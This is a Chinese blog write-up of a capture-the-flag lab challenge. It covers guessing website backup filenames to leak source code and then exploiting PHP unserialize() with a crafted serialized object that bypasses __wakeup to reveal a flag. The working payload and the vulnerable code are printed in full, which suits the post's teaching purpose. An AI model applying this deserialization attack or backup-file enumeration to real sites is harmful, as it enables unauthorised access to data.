[极客大挑战 2019]PHP 1

最新推荐文章于 2023-03-04 08:15:30 发布
最新推荐文章于 2023-03-04 08:15:30 发布
阅读量6.4k 收藏 16
点赞数 6
分类专栏: buuctf 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62879498/article/details/124129841
版权
本文探讨如何通过构造payload,利用PHP的__construct和__wakeup函数绕过网站安全机制,访问隐藏的flag.php文件。关键在于理解如何调整对象属性以避开检查,最终成功获取网站敏感信息。
摘要由CSDN通过智能技术生成

[极客大挑战 2019]PHP 1

一进入题目,就有页面提示我们“所以我有一个良好的备份网站的习惯”
在这里插入图片描述

所以我们尝试着输入网站源码备份文件,看看能否访问

常见的网站源码备份文件后缀:

tar.gz,zip,rar,tar

常见的网站源码备份文件名:

web,website,backup,back,www,wwwroot,temp

发现www.zip可以成功获得网站源码备份

下载后,发现有3个php文件
在这里插入图片描述

我们先访问一下 index.php文件,发现:

<?php
    include 'class.php';
    $select = $_GET['select'];
    $res=unserialize(@$select);
    ?>

发现文件包含 class.php 文件 并且文件是get 传参,参数为 select

unserialize():

  • unserialize — 从已存储的表示中创建 PHP 的值列化后的字符串。

若被反序列化的变量是一个对象,在成功地重新构造对象之后,PHP 会自动地试图去调用 __wakeup()成员函数(如果存在的话)

访问 class.php

<?php
include 'flag.php';


error_reporting(0);


class Name{
    private $username = 'nonono';
    private $password = 'yesyes';

    public function __construct($username,$password){
        $this->username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "</br>NO!!!hacker!!!</br>";
            echo "You name is: ";
            echo $this->username;echo "</br>";
            echo "You password is: ";
            echo $this->password;echo "</br>";
            die();
        }
        if ($this->username === 'admin') {
            global $flag;
            echo $flag;
        }else{
            echo "</br>hello my friend~~</br>sorry i can't give you the flag!";
            die();

            
        }
    }
}
?>

发现php文件中包含 flag.php

并且 设置两个私有变量 ,利用 __construct 构造函数 来进行一个一一对应的关系

之后__wakeup() 让 username 变量等于 guest

在类结束的时候,调用__desctruct()函数 ,如果这个 password不等于100 ,就会输出 username…

password… ,退出函数。如果 username= admine 就会输出 flag 否则 失败。

在本题的关键,就是username的赋值 因为 __wakeup 会对userneme进行一次赋值,所以我们要想办法绕过该函数, 并且在一开始我们要改变 username的赋值

当成员属性数目大于实际数目时可绕过wakeup方法

在这里,我们可以将 php 代码 以文本的方式显示

[推荐网站](php代码在线测试,php在线执行 (dooccn.com))

构造payload:

<?php
class Name{
    private $username = 'admine';
    private $password = '100';
    }
 $select = new Name();
 $res=serialize(@$select);   
 echo $res
?>

以文本方式显示就是:

O:4:"Name":2:{s:14:"口Name口username";s:6:"admine";s:14:"口Name口password";s:3:"100";}

因为前面我们说过 当成员属性数目大于实际数目时才可绕过wakeup

所以我们要将 2 改为 3 或者 比二大的数字

同时,我们要将口变为 %00 若果不写 在我们复制的时候就会减少 空格

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

在这里插入图片描述

hcjtn
关注
  • 6
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
【网络安全 | CTF】CTF极客挑战2019PHP解题详析(Dirsearch+php反序列化)
等风来
08-24 4945
同时,因为private 声明的字段为私有字段,只在所声明的类中可见,在该类的子类和该类的对象实例中均不可见。因此私有字段的字段名在序列化(即构造POC)时,类名和字段名前面都会加上ascii为0的字符(不可见字符)construct 是构造函数,在对象被创建的时候自动调用,进行类的初始化,也就是说对象创建完成以后第一个被对象自动调用的方法。如果构造的链子中含有空格,那么空格被url编码为%20后会导致链子不能被反序列化。得到的扫描结果中包含www.zip目录。提示:有一个良好的备份网站的习惯。
[BUUCTF][极客挑战 2019]PHP
朋克归零膏的博客
10-17 408
反序列化漏洞。
[极客挑战 2019]PHP1
keaixiaohan的博客
07-23 297
进入网址之后如下: 从图片中可以看到关键字“良好备份”,应该网站有备份,/www.zip,http://84ac984d-d4e2-405c-8c84-a828e85691a6.node4.buuoj.cn/www.zip.下载压缩包,打开后有五个文件 首先打开的是flag.php,但是里面的flag是错误的,紧接着打开class.php <?php include 'flag.php'; error_reporting(0); class Name{ private $us.
[极客挑战 2019]PHP
weixin_53146913的博客
04-06 1922
有备份的好习惯,扫描目录得到www.zip 几个重要php文件内容: index.php 1 <?php 2 include ‘class.php‘; 3 $select = $_GET[‘select‘]; 4 $res=unserialize(@$select); 5 ?> 代码第4行unserialize可能存在反序列化漏洞 class.php 1 <?php 2 include ‘flag.php‘; 3 error_reporting
极客挑战 2019 PHP
BlueDoorZz的博客
07-12 482
0x00 题型:源码泄露,php反序列化,wakeup方法的绕过。 0x01 提示网站有备份,直接在url后面拼接www.zip,下载到源码。主要代码如下: <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> <?php include 'flag.php'; error_reporting(0); class Name{
[极客挑战 2019]Secret File 1解题思路
最新发布
m0_74047686的博客
03-04 2336
在做这道题的时候,主要是会使用burpsute工具,并且还要了解PHP伪协议的一些知识及概念,最后还用到了一些密码里的base64,这些都需要了解一下。
[极客挑战 2019]PHP 1(PHP序列化/反序列化)
weixin_45253573的博客
11-24 250
打开环境 提示说有备份,直接拿御剑扫吧。 网速不太好,线程调很低才扫到目录 访问之后下载zip文件 在index.php中看到了传参方式: <?php include 'class.php'; $select = $_GET['select']; $res=unserialize(@$select); ?> 通过select传入参数 打开class.php <?php include 'flag.php'; error_reporting
[buuoj]极客挑战 2019]PHP 1
qq_42250840的博客
06-28 1296
知识点: 1、直接扫描目录得到网站源码 2、public、protected与private在序列化时的区别 3、__wakeup()方法绕过 复现: 首先根据提示网站备份文件,考虑扫描备份文件 首先我们需要一个网站备份文件的爆破字典 可以用脚本实现: import sys import imp imp.reload(sys) import os import os.path import requests from urllib.parse import unquote suffixList = ['.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值